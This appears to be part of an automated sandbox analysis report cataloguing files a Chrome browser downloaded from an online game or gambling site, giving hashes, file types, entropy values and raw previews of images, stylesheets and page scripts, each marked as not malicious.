                                                      Preview:.PNG........IHDR...............^.....PLTE..2..4..2..4).6<.6A.63.7S.>u.Dj.Ac#K...'}HD.PX.ar.6..@..J..^..p...........s.~j............w|jVbUH@TB?66??.;K%%?.,1....(..;..C,.P7.ZB.eH.oQ.|W&.a..m1.r;..E..K..R.X._.i..v.f..g..Y..H..y..U..n..~..n..\..................................~..~..u..m..f..U.K..V..C..B..>..5..1..B..B..;..-..-.v'.h .V..B..N..V6.|?.uI.ZJ.g_.~o.C).i..`..k..7h.<Q.15." ......t..[..D.&Y.;n.J~.U. Z.$d.%p.)|.0../..8..8..>..>..:..K..Y..1~d.gR.q........xw.cq.SW.Qo.Ga"7Y...J..m..h..c..\..V..P..J..E{.@_.?<.0,.(O.9g.Hp.Nx.RP..y......B..].L..U...........d0.Z"._&..[...!..-.:.../..+..+.. .F..9.. .z..l!.X%.K.y?.l6.a-.X#.M..p(.>..0#.D8.xD.G,....-.{ .eK.j}.{...~.^:..9..< .?#.A-.W@.>;.5).3;.>c.Hz.<..a..i..Z.|Avl*`_.HU..F..>..>(+G/@PGPfVb.w.bXvJ20t&#`.'X.+]..@..M..R..G..;..7..4,.$C..?.IDATx..{.\U........;W.. ..^..D ...x.=......#.B.........9......\."..3..3........I..r..\.$.......^...]U.i$.s>.t...Oz}...]{..[..a..-s1...B.f..n.....P...A.{P.....X........8.t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:dropped
                                                      Size (bytes):32120
                                                      Entropy (8bit):7.961863002691601
                                                      Encrypted:false
                                                      SSDEEP:768:jUxrJaa6Lq/3LqbhSXFW003BO64tVFbCKY6+bEv2qA3ul:jUxVn6LqTqsXA00d4t7qTRp3ul
                                                      MD5:51F5B40830F79D38815EAEC587D1A540
                                                      SHA1:78363647EE7A3A96CCD8675F62F819B3868A1AF2
                                                      SHA-256:F8222FAE4FCC173A471AF9C8A3B8358627410A4C84FA12EEE5ABDA7C5A3EC15A
                                                      SHA-512:231F22B906BC56ED2D6B5B5098F426226558C7DDC8BF95D30DDA8E781FF7BBEC5C38DAB970150EBD442E0AAE43A350AEFB270894092E7D4B6A273A1AC385155E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C...............................................................................................................................................................................$+?.!...1.QQIH. ..QQQI...HR.)...3.Y.............1IYAQ........0....R.....H....@..J..E .6|.=.Fz...pRb..s.)...........................{8.......<.{x.>y..:....q.=DY.P.>".:..........................I...'d/.-..<Hz...i.d.:...P.A."y............................)xRT..._.8.^XRZ2.0....s.R..`.........TT...................;....e....y..z...'..SO......,............@RfN.t..w.xt...7.h..H......................x.x.}.=O.....u....z.y...`.............Rw.......2...d..`.Rr...;.....c....................?..C.+..|_..xu<..A..zv;..g......|........;...M......Sn..@.......o..X..ag>vig%....p.....cG%MMW_..(.................(.n..v..N....'.?7.6.........n..}7X.;.3..s.=!..........z^.....%.SW.'.+.....V.l..r^...r..>}......Z....f.........*:..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 269 x 79, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):15513
                                                      Entropy (8bit):7.977043692770378
                                                      Encrypted:false
                                                      SSDEEP:192:Kp0947zwW548o0qGqTqwSI/y8PniV6wN68I2nfKgLyzpbdTQzv3aOyYNqbIkvGyk:+09I520qGqtS4niZx3fK1NBTKBRqbIkO
                                                      MD5:79C9CE3096B81123A25BA5DAC9F361B9
                                                      SHA1:9908604A4E3BDC991784199B319CBA162255BCB9
                                                      SHA-256:DC2129A4C7C9E426962A3A36D8180A89C1F931230CDF83ECD915B4BD635AA554
                                                      SHA-512:902039E1394BA0A6E9C5AFCB86EA420DB1F6712D6FDCEF76879BD882EF7B682D4D388370EA9081026C38AD6E93BAD81177885C412FAE35D9B5B56A99B4D667C0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/g02.png?ver=1606793399
                                                      Preview:.PNG........IHDR.......O......+`.....PLTEbO.......fR0...888.........jV5:;5......bK+kU....eM-874==;WE$....p@..........l>....zGoX0.}J|d8RA!.vC......\I(.sDy`4.j:fQ(....f8sY3.h?)*&..M.....O433$#%.....Q95*#....UT......yJA1....,.... -..(.....<*.u]0%$.4+)...1'.8!.m.....x...r>.#.9*.J7....DDCaH"J/.3/ ..WhgfG;"...F..D .Q<..... ..z...TF-.\7..MKL;..{....a/$.1:0a....ppp..oZB....r^9B1'd...qo......d..bya?D%...HVWU.b/."'."".p.]vkV.tR.....rTF@+.........qD{yx..o.k.qcY8%uX#....l.ECZ9......X.SK.D=).....g.VW.~V.z.dd.aa_PD.EF..`jM.ZP5..w.....T...hiK@2.n0q......j...jk.JHyjGn[C.s]Z.44....]a_.ieh`MW+.......{.iK..y.vv.hK.0).{ .QF89.+$..........^.US.\&..._:8....}..l.OG...50xH!....vu.H1.~{..m.[Z.~N.v3k=.....D..8.W6.....j6(...~d.HtE?.86...~.....b wE.....T.6!..>....N>.i>oB;Q4t....^.~....;i-..9TIDATx.T...Q....f....a..J..".Y...1.r.E.VC..L..!.u....+..@.E`...A..)".E.l.......z.3..0.:.9...1..z....oVY...j.&.8 I.EY.......JDq..;s......".~.nwty...K9....P...3..4UU.E...$TL&U.4.I
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):943
                                                      Entropy (8bit):5.159290523270169
                                                      Encrypted:false
                                                      SSDEEP:24:XCaLf+drP1UUxrBkmGpDK3DHPw4n1aO2jU9bmzdh:5fML1EmGhKTYyT8gYh
                                                      MD5:8769D3936DEF17EB1F19180E72BD61A1
                                                      SHA1:094B441638058E7BF0237F4C7821F294A022192E
                                                      SHA-256:B51AE264E880267268E3B793A3AB0781ADFD638FCB8C173E0AE3E48C9C1BE227
                                                      SHA-512:FA32870AEB8D83544EC2845D0843DDD2DF1AA488511D32EB29A74D2544BF24BCE713EFF35B33FB395D35B738B60C329EA4AF49A03B06E577A04563DFAFE7A1A6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/unite/share_unite.js?ver=1661222874
                                                      Preview:var login_flag;.$(function(){..function playgame_modal(type, gameid,width,height){...if(type == 'try') type = 'Try';...if(login_flag || type=='Try'){....window.open('/loadGame/'+type+'/'+gameid, '?'+Math.random(), 'menubar=no,status=yes,scrollbars=yes,top=0,left=0,toolbar=no,width=' + width + ',height=' + height);....}else{....$('#login_modal_unite').modal('show')...}..}...$(document).on("click",".playgame_modal",function(){...let width =$(this).data('width') .|| $(window).width();...let height =$(this).data('height') || $(window).height();...let type .=$(this).data('type') .|| 'playgame';...if(gameid =$(this).data('gameid')){....playgame_modal(type, gameid,width,height);...}else{....throw new Error('....:gameid');...}..})..$(document).on('click', '.draw_H, .draw_V', function () {...if (!login_flag) {....$('#login_modal_unite').modal('show').....return false;...}....window.open('/prizedraw/default', '_blank');..}).})
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 32076
                                                      Category:downloaded
                                                      Size (bytes):9116
                                                      Entropy (8bit):7.9759062922129775
                                                      Encrypted:false
                                                      SSDEEP:192:FTGaU6c01i8pSTlESk4AmAR1pdHHQY48img32xJMPOp7ox74QBoZ:tGM7pUElmCHHQqimDqaI7bBG
                                                      MD5:AAD113FD284835EC1FBB255356C22CD9
                                                      SHA1:2F1F193ED345C0E42BD022A81F760CF6A24DCE6F
                                                      SHA-256:237392C7D3FAE346242BA9EC97752768659DB0AF525265650A4415A893F1DC7B
                                                      SHA-512:9D10075BFE84A5892781CD3C92120BD40FEA2A0CFAE473A31F0B6B97ED76247D4CDCFCAA977AF72FD160D2D2CFAB9E6440C8BBC3727A94BC4DBE16326CB78804
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105
                                                      Preview:...........=is.H...W......'..ac.........\_&..@FHB.....7.JR..]....*......W..ec...{......zZ.oj.TS.u.T..?..0....>...:..+(.:3{...ea....,.~...|.-.....m....p6..t.....uB.......-......).........~...\...........9..S....m...y.i.lKg......,.a..< .k...=\.+L....-l-cW....ru.<....?P.....P$.3\.db....L..Mww.g7...t.........>{.X........k8.c..7..1.....:. f.7..m...P0NR..1..!...P..#..=......=P..#..ox..rR..0..cDG\D)...-.3.&~...."V`......o....Z+mn............jm.V...3.j..I@.......5.(....V.G..e%......R!..f.......yD...aM..4<.wW.w.&..L.<S7...*....q5..*D..#.MT...(....6..C.C..5lo...#o.(...'.1.s*.T.?.Y.2h..J..]....~.P..H.Q...a.K.%. ......].o.4..1.........WLB.tTV..(......(d.J.....D.X....F.y..D...RJb-U.8...d.1...p......B ..2&....dY.C....,..$.)..Bb..2F>..^.z.>t..g...i..{..W...i........u..Fh.4..hN...o.....X2V..p..=.....]8-.B.k...>.f.L!*|s=..8.-9-......0......g\.i..j..9.l.j....)$>...G..vQ....b]7u.|...0S7..$^.^...W..x.V/.>.w.F><U.K.......3.,..,..].O\n.......XJ.b.l. A.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:downloaded
                                                      Size (bytes):56687
                                                      Entropy (8bit):7.982486952925965
                                                      Encrypted:false
                                                      SSDEEP:1536:2Ycrbc0W/4o2+9JFGJhapyPTQyIApyNO7:Qva/4o5JF4EwTQvO7
                                                      MD5:15E3740331654B665688615FD33C2D30
                                                      SHA1:D54CC8B341F1C70ECEC2356A6673965D033F5A44
                                                      SHA-256:CFD43CD910F2C49B95ED5F3989221618A113745DC67F34150AA9AE49359B47BB
                                                      SHA-512:3C576E00B0B03785DAE90B1A42ECFB04389A8910899EC7FCE0FB8E4B49B876ED974A60798426F8CFD03E5FD5C5688A6D47A915D9F3CC91F990250C634F027198
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner5.jpg?ver=1606891700
                                                      Preview:......JFIF.............C....................................................................C.............................................................................................................................................................................................RR...............Y*>.O.............................z2..:.rN!`..see.p.........{R...@........................7.l..<....... ..L.i....L......F...........................O#.....#)2O6x.....fk<a%.^F..CS..............................Io.G.....;.$....m...-.................................L.gqg.Vy.n.O...v..=m]0.ig.....;.b.........Vb.............:..Q-?......*)2.P..f...@...A..W...R.........q.~.....".>...y+A.k..f...............KW......C...........|.....nO.m..Vu.i......0...y.,X....x..s.6....n..E..7....$...UU.y0=UmE..Q&.Yn.u...,..eu....H.s..........6..........N4.J.oo`.........o..v..O.=h.p.x...m......*6.j...}....y..x..Z.&..Z..z..H*...X7=..w...]..|..|.|e.. ...}..{..)n.I|/...[.0..c..0.....|.s....;.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 256 x 240, 8-bit gray+alpha, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):7074
                                                      Entropy (8bit):7.928012384219511
                                                      Encrypted:false
                                                      SSDEEP:96:gMXxllGqNJYXQT1pTyOgoz8D1EYwRxOmTtWuXrevpJS/Rq3Kt3KlASyN6KaP:zXTvYXQzy51nfmcuXibSralG/aP
                                                      MD5:00DD0EC0A16A1085E714C7906FF8FB06
                                                      SHA1:244BD9B7C3B1C4F7EF72DE31F67804FAFF213715
                                                      SHA-256:5D04051DFD9D2D740355404F98A683D1EC0FEB2FCA7D76E533C1A6E5CE92DD2E
                                                      SHA-512:163AFECE9AE9693C41324FFD89191132A8D2E42D73F962ACE0B70B44A17D954C8F506CC25AF152397E2536DA6245E4336AE465708EDF6EDE955B4AD502AF7A71
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............E.r@....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.U...I....tIME......6..F....IDATx..{.$G}.?m;....!.>...l.....G$,..&.%.|.........].]..=...?ptg..Y.G.. ...b...'....8$.f..;.#...A..G......3;...=..L..........W.^<................&.=.Ll&<.D.Y.V.D.^.`..O..r..`.:.$)...=.L.s....L.=?..a|..6...I#V+A...1.L).P.!......)$q..<....U`....r.2...t. )b....B.zDD....'O....{.5....[.Y.`..]az...GtwS..S..l.. 1.z..!(..h~.L.`V.U..{..g.ws...l.g......p.U.f.2..CP.....C...[.mVF.y...h8.J`....px.4.....'@....px.4... .w...d...p...)c.F{.....S.......>R$)g...3W....i...mk~[.+.O}.#c.P...._.OB..mz.-..=.)w.....i'.#...@.].S/..c.>]..L.[.......e.%PE.dR...=..\..').W..0..k.0..o2.:....A..'@....px.4.....'@....p.3........._+-..s.E.K%.2..5..UA...(.<..`......+H..=l...>0.b'G..n%p.U".YR.[..........R...q._`....H.5`...@.%6..b)....Z|.......t.Q.i.E.. Lc.J.xw.]..K... 7...........$0txzl.\.Y..wk..!uS...[..L..K..:(...f].K(......lN...u.'.vw.IdU.)n.K9(...u..f..c/.<....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):25560
                                                      Entropy (8bit):7.981746968688875
                                                      Encrypted:false
                                                      SSDEEP:768:jiZFc9RtW5p1M5jKq99QUdXWEUpWtr8xj:ji3cZWm5jKqXQiXwW58xj
                                                      MD5:E54046CF39640C576C2824A787BE106D
                                                      SHA1:818ED93066F698F9B0919FC7A2EE84B70E5CEAEA
                                                      SHA-256:DDFF0426C6E649E7EB2FF35AD48AA67994BE7E402DA4BF50EC51FDB759654CAE
                                                      SHA-512:CC11A1B1BE2F5A65594AF160876D8000F68030E879AA85EC97E75AC40656ED3C3F9CA410D879DB03510155F85E019B111507AC4145E894DCBA3D5E9D0ACE8615
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/xin/802.png?ver=1664356540
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...!.....)'".....................,*'...........q%".&.......x+........1!.. .&...!2$".2-#.......".}Q....tK.."....jD.........g...7'..[............d.(9...@+..!....:4&`>.Y8.O3.......T...-..}.1@.`"..[H,...$....n........[)*.....(....5&......=,.C3.......)..........Q..xT<....G:%`E$}n;D@...K....<J...44.wR(...lM&......................9..............Y)...OL..j*.u5.KR..C.j+..3..+.t4.b...v...C.....,.. .................`Y...E..........o...O.a2...OC-.nE.B:j5..J.Zc.6......A....a..`....n.{=...Z....X.tJ..T..j..9....O..U.......!..]..[R:..T.............to];....N.....rZ.......js..!.h..&..)Y'...].).....<...M...xd.]R..C....2.Dso!.FK.i.......nmws.G..-...@..g.....)....]^n....W]Z....(#..o....}.qhV..v.5.}......jh.AC....(>HD.F..x74.a#.yJ.CE..........Q..... .IDATx...@SW..C..W.X.*.(!l.....LC....H.....X.UD.d...d.PP.AA......V[.....{.......!.......\h=Kj.Ec11zL&3....r.4l.h.v.Z..psQQQs.O....w'..{..z......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):12129
                                                      Entropy (8bit):7.955243755221839
                                                      Encrypted:false
                                                      SSDEEP:192:RKG6SafJtAyXeOlPXZlxrsWGqjA/xWbfBArCo2+akzqL26GoSJfhlU4:Rxaf37rXiwjA/xWKCo2XkWGBv3
                                                      MD5:5F5202C81B799897771A1CF02D4DC6C7
                                                      SHA1:B4FC1F022CA5B1315842E78E9A2AF633A3934F5C
                                                      SHA-256:9F717A195453EE80C8E5E17D3F3BCC95A41DC06EC53A377A0D27A32E25BCFE2E
                                                      SHA-512:FEA1DAF8E8C340F7117C2CA45499CCF68C724F4BF622B70778285C6F9BAB0D1A5DCBBBBFFCA693CAFD5DDAF14DC7ABADF96E4D2CB42720499625678B50DF363F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/196_egame_logo.png?ver=1673578660
                                                      Preview:.PNG........IHDR..............P......PLTE.....................#$....ig.+2.......67...QU.WM.aX._`.yz.....a...hj.wp...eg.y...{.p.9>.nh....L@.}..w.]O./0.RU.WW.@A.ce..$.. .....&&.KK.CD........<C.=B....46.&-.e[.j.FI.t.<A......}.......................y.........ZC.*&..../).##.!!.......,(.J:..........\E....bH....@3.&$....<1._F..........P=....WB..........F7.6.....iL.............c....9/.U@.R?.C6.'&....fK.L=....o.\.1+.4-....^..........`.qQ.kN.g.nO.j..Y.e.|X....tS....wU......r...m.dI................yV...................................................GJ.....&..................01.40......89....pt.hg............,).......IL......gj......ve..w~.hn...rv....$0....:B.?4.....s.TW.2<........]`..#....^c.<I.J9.LT.>?.SW...{..R\.<B./9.......}.t.[a....CK...."....EtRNS.....)......::..K*...o..I..wZ=.].......r].O.....i.....H.y.....e..Q..}..+.IDATx...1j.0.@QK.K..x.8uh-.*...0=B...R.^..w...C..EIn..w........................InL{.:..h..l..'..O.t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):17173
                                                      Entropy (8bit):7.958458639912686
                                                      Encrypted:false
                                                      SSDEEP:384:E6cwcC3wp4aJ51Vebop1AoKeDwJhqSg6/0pPeXXfY:E+3wp/751A4DwHPg3pPUQ
                                                      MD5:0CC619403125894C73CB591AF96DE60E
                                                      SHA1:3C98F73DCDB1F91DE959FA1055956F31BE06DDEE
                                                      SHA-256:831A56775868C3E7BBB403FDAF041CAB1CDAD2CDBF0F6DAC37774654FE268F06
                                                      SHA-512:C865785AFEC23A72B06C495CFDF2BA3765964A067FB10E9A4750388092C9641097022F17341FFA4BBF092244DE49B4DF17A592C33E2EE1BF032F7FE0886F42E1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE...............V..g..........u......*.........m ...t............r. ......"w...1..|....7........5z.p....*.o.........8..}!..:......w..e~..Cu3.|@.....z.A........6....v..4I..G...1......y.........Z...........4^..(.-....Uu.......)..t..4.I....)!.5.u5......:.....k.D...3..T*....O..l..j.....&.v%.. ....D..O..+...Z.V.......A^...........t;...u >.`..9.|*...S..;......; ....)...`.Y{..$.7.j..}.......2..?........9N.k;.0.P.'..I\....R........z.G.........7<.].....}v .....4.g.-.Io......=....,^.4......c.i>..x+..02.F...5.8......A@.]9...du'.......P.1..y.o`.W.[..C9.Yg.....*U.O=..Y.=......<.)I.o..3.:.....YO.6........O._.....~...F.._qq[C..S.w).GF.!......UKl.%*().B..r..........fRe oz1C.l.J.+.OKM].T....<!...P..?.IDATx....@Te.....B1..e*......&*..(.,.4..+..1..$q.....Z.}Q...b..!E.BY(..Z...u..o...[.v.}>..r.3..}....8....<.s.6....F..........SO=..;hdO=........O.y.M.4thv......`....p.........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2599
                                                      Entropy (8bit):7.788473538181402
                                                      Encrypted:false
                                                      SSDEEP:48:ibBS8aDsLM+aMz0HXmMZJatCCyWkzhGlTXNi7dqv4xRP:ibB0sLM+aIMZJWyWkzwlTEtp
                                                      MD5:1ECDF7CBE71EA9A4DB26078A523FA00F
                                                      SHA1:AB478C69DC56CBBE268897510222AD91A6959FD1
                                                      SHA-256:D125E30B43C0F9A84293C05110E27D268C1977BC85EA22946EB9AA4A045C570F
                                                      SHA-512:EE5DA28CB5BD752DDA7204BB1B0DE4802890F3458ED22413E3CB1DB026943943F583781F143AEB6CFFF42FD529AF4B7BC01AF66145765E6C3014D3A44F792881
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....`PLTE.........c........>..>.....>..>.....>........>.....>..>..>.....>..>..............>..>..>..>.....?.01....tRNS....@..@ ..`..0. ..P`.0.p.p.Pa..c...XIDATx.................................m....|:.K...(...../.$..z~Ij)...g...\...i..i..i..i..i..i....>...h...g.1.(PL......F:..q.b..uw.M0b.F.'R>..z..k-_$w.N.PZ.g..z.:I.......1.$~.....,.'...c...[.B.w..7$M...H^.P.P.,.../.K..\D.T..%.^%..P1.....b.x..B..~K.[T.r..*E.">..(r.N......yDW..L&%....Tv..D.J.O...~.\...*@.fTC.T..*..e...........#...I..U]N>r.X.sq.....WH....e9.5.......g.p.........8.x.u.r,...c"..3.d.OX.4.....2...x.T..u.g.Wq.(U.../........a..8....x...]..%.e.......y....;>G.4.....l... s.......v....^0Y...-O..F..92xl...>.n...a;._.W.i.++..,.M.g.....9..(..a7.....J...[n...%0.Pt.e._S....{l r..4O.G$......v...s...8Ir.....H^p..gu.v..,U...1u...o.y..0`$E..#F..1d}.....Z....K.RtQ0...o....Y...^........C#b...$Q..H.^6'.S.'5....X".R..(.w.4:.9.%B.R`...A...D.*P=5...l#.g..l$I.....-...Y,8.x*...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 2599
                                                      Category:downloaded
                                                      Size (bytes):823
                                                      Entropy (8bit):7.733102189768422
                                                      Encrypted:false
                                                      SSDEEP:12:Xvz22gh9vaND1LXnT5Y0Y1lvEe511de1tmNT32ciIzqYYenzxw1g+8xhS7zo2s:XvN4E91LFMJE+1E4CcvmYYUzG98HS7z0
                                                      MD5:A03D0819177DEFB97D2E6D6643C33CE3
                                                      SHA1:ED85D84610FCD31545940B96EFA19263BECF9C9F
                                                      SHA-256:B99C242AE96562AD43F9EA04C1DAEDD3E6EE69F648193765FCF72F235A3E9130
                                                      SHA-512:7A5BA93930085267098EC538B83313B44E7DC903AC710F3C021B5D27C909DF4E8BFF0B8B7351B46E78D07B7706F3E536A0829B8432245D5924DC2BCE6228DD41
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/login_modal_custom.css?ver=1726649910
                                                      Preview:...........V.n.@...).UHPuS'm..r...7....:..w...M[........'...q..[0....i.6R${...of<40K.Le4+..\.Y....Z...P..xdA......J..b.HHO..M...|nb2...g.Y...S.%..`6|a(."W1I.2\;{..tL.....N@.z.'Qt<.....r.74....?....d..D...G....Z.f....<.]&.>....(s..G.).L&. KOs...0:...TU2.....1P..z..+.g.^..=..m..B......_....4.M.BQ....sOXm.'.."Y.e.b'.........>....Uj4.....Q....5Y.q.2..Wb..f...T..d4..kI...Y......L.d|.NoM.K .M..+-.*...=......Ax..J..XK.%3..#Hn..).6.....[f*..4..5_,.@....>5...Em.|.F..r..Z..P._.3....\. ..z.uG.;..E.....3....=.-h/=..v...a..$..M*..........Y.%OM.-..=.<..^.....c.r..vu.T._Qv.7.^.n.4.G.....].B.]...).Sw[..<`.t..x.g.b.s...~w.pE.w.sS..?.../..%..NzQX.a...(t=....~t4:..................l.n.uH....X....V....Z.....P......E?...L?....EE..>j...iA{~........B..2.4...+...s....B.^f0..;.Mo.-...X'[.5.........'...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text
                                                      Category:dropped
                                                      Size (bytes):12444
                                                      Entropy (8bit):4.462394055562315
                                                      Encrypted:false
                                                      SSDEEP:192:7Wa+quJJuwcd/6K4Ji7LuJw7nw19hJgeLyOq7wbyG1oiHgWrGJomSb+y:7W63diJdRgI
                                                      MD5:FA6D861EB77FE21E9DACF09EB1D842F4
                                                      SHA1:98D475B22D5372C4078CB0B1870EAC5CFA077BF2
                                                      SHA-256:C860298D58109FEB82B3333B0CD22B8D939F9E7EB249656D492593A72AAD1D9F
                                                      SHA-512:5F1D61B045484DC066E7F5DF69FDA1546E6CD494BB0FBB93D2BCBB648792A8CD192CDA1E254BBC4D3CEF3F3F4277BB848AC6E247580632F41A9506CD4A4043C7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:var favorite=[];.var time_jackpot;.var gamename_sreach='';.var egame_unite ={. callback_game_cat:'',. getcatlist:function(platform,egame_filter){. $.get('/getcatlist/'+platform,'',function(obj){. var str='';. $.each(obj,function(k,v){. str+='\. <li data-catid="'+v.cat_id+'">\. <div class="icon" title="'+v.cat_name+'"></div><span>'+v.cat_name+'</span>\. </li>';. }). $('#game_cat').html(str);. $('#game_cat li').click(function(){. $('#game_cat li').removeClass('active');. $(this).addClass('active');. let catid =$(this).data('catid');. if(egame_filter != 1){. $(".filter_ul input").each(function(){. $(this).prop("checked",false);. }). if(catid != 'all'){. $("input[name='cates'][value='"+catid+"']").prop("checked", true);. }. $("input[name='pfs'
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (627)
                                                      Category:downloaded
                                                      Size (bytes):29903
                                                      Entropy (8bit):5.433113004758675
                                                      Encrypted:false
                                                      SSDEEP:384:lfJSoLMJJTRl6s1JXFVCFI/TayvuodsZPIGm8XaR1JRwvutq1tGdc7M04gRw6:lf4VJfHgMdvussZPIx82Rwvutcto07v
                                                      MD5:5A55775FBFD034CD3C9FE4DC28237278
                                                      SHA1:AFF3B620F0BCD9B7EA00334DE75613C24BE5BB64
                                                      SHA-256:C1778123BEA37F2F2A06B779A29A8A8903756EE09B6B7A8CE65EF756C3A1B60C
                                                      SHA-512:1D959BAB3EE870E4EBB407233CF1E4EF5B2D59374C87256F8790F0BE868BD1F0987108C4233505C1234F9DB3FE091CEF4290D0C346E84C0CA46C207F07E82F10
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://hm.baidu.com/hm.js?947ea0365dd8ab01fc51bd9439b42930
                                                      Preview:(function(){var h={},mt={},c={id:"947ea0365dd8ab01fc51bd9439b42930",dm:["bt5.mklojoikm.com"],js:"tongji.baidu.com/hm-web/js/",etrk:[],cetrk:[],cptrk:[],icon:'',ctrk:[],vdur:1800000,age:31536000000,qiao:0,pt:0,spa:0,aet:'',hca:'E4D1CF12C6FA10DD',ab:'0',v:1};var s=void 0,t=!0,u=null,x=!1;mt.cookie={};mt.cookie.set=function(e,a,b){var k;b.C&&(k=new Date,k.setTime(k.getTime()+b.C));document.cookie=e+"="+a+(b.domain?"; domain="+b.domain:"")+(b.path?"; path="+b.path:"")+(k?"; expires="+k.toGMTString():"")+(b.ec?"; secure":"")};mt.cookie.get=function(e){return(e=RegExp("(^| )"+e+"=([^;]*)(;|$)").exec(document.cookie))?e[2]:u};.mt.cookie.rb=function(e,a){try{var b="Hm_ck_"+ +new Date;mt.cookie.set(b,"42",{domain:e,path:a,C:s});var k="42"===mt.cookie.get(b)?"1":"0";mt.cookie.set(b,"",{domain:e,path:a,C:-1});return k}catch(d){return"0"}};mt.event={};mt.event.c=function(e,a,b,k){e.addEventListener?e.addEventListener(a,b,k||x):e.attachEvent&&e.attachEvent("on"+a,function(d){b.call(e,d)})};.(functi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):25426
                                                      Entropy (8bit):7.9888984456746295
                                                      Encrypted:false
                                                      SSDEEP:768:2AYrR0fnylK/z3rI48gLpH/f0Qy2yXY2WVa:3Tyirt8qf9JR1Va
                                                      MD5:F5D8F4269FE5102095E970A947E2DD3F
                                                      SHA1:235DA9BFE5108D060EC815F604E4B8672D45E3B0
                                                      SHA-256:E92A6E1B5EAE15492681F6D5D1610E17A7A0AFD2F4B929248DE15B2E2C19BCB7
                                                      SHA-512:0EBE37D38FE29577017807D5E92BF65682ADAF131C578049D623701917E1F56777C54F478415052C4FB0D0272535058AEB635CDE27BA9EF15B3C4F66511360CB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/5m6k9j7rwspjs.png?ver=1673334590
                                                      Preview:.PNG........IHDR...............^.....PLTE[MA1("+".......7-&bSF$..<2*...TG<B7.n.. ..UE2...+..G;4...jZKM@7...d..4..=..ca....x........Y.....Q(.G%.ZK7....U+uv.Y2.......jh....f/.q5..R).a0.o4e;.raRbQ<....E....`......F"N..}iW.L!e*.....W....?........i6...oF.]%.....C...{9.....I&{H.iXB...|s..[..yA.`1...m9..c....{; -...P.L.....Z..l...&..|h.M.;..U2?..._9D...P..y.I..2vF..f%...ko..x:.t............)N0...6...seucH]7..........._....vR=&v1....S...:.....t<.......m.....&............e?%.....iE....j..!~D?.-.y u .....5.......".Y.......F.N........{....s..Cx...I..F...w..vT.......y.QM.s..[..!........yQ./......tiC+.....gXLJ....w..n..b.i.bTV....]fa>I..i..U*....{.zO[...naa.....'...`Z.....$znk.%..2.8.@..lk...............C.~.......uo....=...........[.HBO.UM....~.1%tg.......`Uo.........`.IDATx..oh.e...+. q!b....k...RDo\L=....k%.h....QS.YS....E.@;..,.....[.....X..V.T...p..~..'$].9..<..K6.....PO...CE.tu...{{..H....X.......-.Uf......7==..!..A.mZ3.RM73Qx:..w.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):25560
                                                      Entropy (8bit):7.981746968688875
                                                      Encrypted:false
                                                      SSDEEP:768:jiZFc9RtW5p1M5jKq99QUdXWEUpWtr8xj:ji3cZWm5jKqXQiXwW58xj
                                                      MD5:E54046CF39640C576C2824A787BE106D
